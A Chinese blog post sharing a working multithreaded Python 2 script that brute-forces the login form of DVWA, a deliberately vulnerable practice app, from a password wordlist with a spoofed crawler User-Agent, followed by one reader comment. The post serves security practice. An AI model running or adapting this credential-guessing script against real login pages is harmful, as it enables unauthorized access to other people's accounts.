正在阅读:

[python]DVWA表单破解多线程版

5,679

昨天,我发布了[Python]DVWA表单破解单线程版,看到这个标题想必大家已经知道了,后面肯定还有[Python]DVWA表单破解多线程版,那么恭喜你,答对了,今天给大家分享的就是[Python]DVWA表单破解多线程版。

[Python]DVWA表单破解单线程版请参考:

[python]dvwa表单破解单线程版

python多线程破解DVWA

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
# Date: 2014/8/30
# Created by 独自等待
# 博客 http://www.waitalone.cn/
import sys, time, httplib, urllib, threading, Queue

starttime = time.time()


def usage():
    print '+' + '-' * 50 + '+'
    print '\t\tDVWA表单破解多线程版'
    print '\t Blog:http://www.waitalone.cn/'
    print '\t\t Code BY: 独自等待'
    print '\t\t Time:2014-08-30'
    print '+' + '-' * 50 + '+'
    if len(sys.argv) != 4:
        print "用法: dvwacrack.py 待破解的域名 用户名 密码字典"
        print "实例: dvwacrack.py www.waitalone.cn admin pass.txt"
        sys.exit()


queue = Queue.Queue()
success = []


class multCrackdvwa(threading.Thread):
    "DVWA表单破解函数多线程版本,Code BY:独自等待"

    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            try:
                password = self.queue.get()
                params = urllib.urlencode({'username': username, 'password': password, 'Login': '登陆'})
                headers = {'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Baiduspider'}
                httpClient = httplib.HTTPConnection(host, 80, timeout=10)
                httpClient.request('POST', '/dvwa/login.php', params, headers)
                response = httpClient.getresponse()
                if response.getheader('Location') == 'index.php':
                    sucmsg = '恭喜大爷,密码破解成功!用户名:%s\t密码:%s\n' % (username, password)
                    print sucmsg
                    success.append(sucmsg)
                else:
                    httpClient.close()
            except Exception, msg:
                print '搞毛毛虫,网站都不能访问,请检查!', msg
            self.queue.task_done()


if __name__ == '__main__':
    usage()
    host = sys.argv[1]
    username = sys.argv[2]
    pwdlist = sys.argv[3]
    for i in range(10):
        t = multCrackdvwa(queue)
        t.setDaemon(True)
        t.start()
    pwds = [line.rstrip() for line in open(pwdlist)]
    print '字典加载成功,共有字典%d行!\n' % len(pwds)
    for password in pwds:
        queue.put(password)
    queue.join()
    for x in success:
        result = open('result.txt', 'a+')
        result.write(x)
        result.close()
    print '报告大爷,破解完成,小爷睡觉去了,拜拜喽!\n'
    endtime = time.time()
    print '脚本执行时间:', endtime - starttime, '秒'

本脚本参考了花开、若相惜的多线程网站后台破解。。。

经测试,多线程版本比单线程版本确实节省了不少的时间,如下图:

多线程破解DVWA

PHP+CURL多线程实现的代码请参考如下文章:

CURL单线程破解DVWA登陆密码

CURL多线程破解DVWA登陆密码

目前有:1条访客评论,博主回复1

  1. 墨子鱼
    2015-09-20 22:19

    请问下运行这个py时,网络不能访问是咋回事呢?电脑能上网,破解的链接在浏览器也可以打开,,求解

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌